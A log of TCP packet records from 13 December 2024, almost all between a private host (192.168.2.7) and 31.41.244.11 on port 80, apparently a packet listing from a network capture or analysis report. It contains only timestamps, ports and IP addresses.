Dec 13, 2024 18:53:54.513061047 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.513895988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.514043093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.514045954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.514081001 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.514379025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.514441967 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.515081882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.515368938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.515410900 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.516041040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.516082048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.516942978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.516985893 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.517204046 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.517220020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.517245054 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.517251968 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.518198967 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.518244982 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.518445969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.518631935 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.519119024 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.519159079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.519687891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.519732952 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.520450115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.520492077 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.520606995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.520647049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.521210909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.521228075 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.521277905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.522773027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.522931099 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.522978067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.523200989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.523216963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.523246050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.523268938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.524293900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.524310112 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.524352074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.525353909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.525369883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.525401115 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.525427103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.526199102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.526379108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.526421070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.527407885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.527422905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.527450085 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.527472019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.528323889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.528338909 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.528379917 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.529283047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.529339075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.529489040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.529877901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.530309916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.530327082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.530355930 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.530366898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.531244040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.531368971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.531411886 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.532486916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.532531023 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.533396006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.533884048 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.547333002 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:54.547364950 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.550126076 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:54.550126076 CET	49928	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:54.550154924 CET	443	49928	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.672360897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.672415972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.672435999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.672481060 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.672667980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.672683954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.672717094 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.672727108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.673715115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.673731089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.673840046 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.674612999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.674664974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.674844027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.674904108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.675625086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.675671101 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.676594019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.676701069 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.676724911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.676760912 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.677696943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.677720070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.677747965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.677767038 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.679003954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.679069042 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.679085016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.679114103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.679141998 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.680138111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.680154085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.680304050 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.680965900 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.680980921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.681010008 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.681034088 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.681886911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.682728052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.682745934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.682771921 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.682801008 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.683348894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.684751987 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.684787989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.684792042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.684804916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.684827089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.684849977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.685365915 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.685405016 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.685905933 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.686780930 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.686796904 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.686814070 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.686824083 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.686845064 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.686865091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.687951088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.687967062 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.688019991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.689163923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.689179897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.689213991 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.689239025 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.690267086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.690283060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.690340042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.691359997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.691415071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.691632032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.691673994 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.692193985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.692209959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.692234993 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.692245007 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.693854094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.693870068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.693913937 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.694397926 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.694412947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.694439888 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.694463015 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.695365906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.696065903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.696080923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.696096897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.696110964 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.696141005 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.697037935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.697058916 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.697079897 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.697103024 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.698196888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.698613882 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.698667049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.699016094 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.699047089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.699093103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.700009108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.700037956 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.700083017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.701097965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.701127052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.701139927 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.701167107 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.702307940 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.702528000 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.702569962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.703258991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.703274965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.703299999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.703324080 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.704035044 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.704060078 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.704103947 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.705167055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.705208063 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.705833912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.705876112 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.706078053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.706124067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.706172943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.706213951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.707124949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.707166910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.707367897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.707408905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.708147049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.708187103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.708425999 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.708467007 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.709109068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.709156036 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.709209919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.709256887 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.710202932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.710355997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.710398912 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.711210966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.711255074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.712191105 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.712207079 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.712234974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.712244987 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.712318897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.712358952 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.713344097 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.713387012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.713433981 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.713474035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.714351892 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.714354992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.714397907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.715341091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.715384007 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.716170073 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.716185093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.716200113 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.716212034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.716237068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.716237068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.717340946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.717360020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.717405081 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.718357086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.718373060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.718414068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.719373941 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.719439030 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.719917059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.719958067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.720273018 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.720289946 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.720315933 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.720325947 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.721422911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.721463919 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.722332001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.722347021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.722362995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.722389936 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.722440004 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.723365068 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.724179983 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.724236965 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.724313021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.724349976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.725881100 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.725894928 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.725931883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.864115953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.864603996 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.864631891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.864646912 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.864779949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.864779949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.865470886 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.865488052 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.865534067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.866630077 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.866645098 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.866688013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.867384911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.867425919 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.867861032 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.867903948 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.868932009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.868983984 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.869497061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.869513035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.869541883 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.869554043 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.869879961 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.870584011 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.870626926 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.871098995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.871143103 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.871624947 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.871670961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.872643948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.872658968 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.872693062 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.872701883 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.872751951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.872751951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.873528957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.873888969 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.873891115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.873934031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.874619007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.874635935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.874664068 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.874685049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.875612020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.875627995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.875670910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.876631021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.876647949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.876681089 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.876704931 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.878460884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.878478050 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.878524065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.878774881 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.878792048 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.878819942 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.878846884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.879755020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.879771948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.879812002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.880690098 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.880706072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.880750895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.881886005 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.882671118 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.882687092 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.882704020 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.882715940 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.882744074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.884092093 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.884119034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.884165049 CET	49917	80	192.168.2.7	31.41.244.11
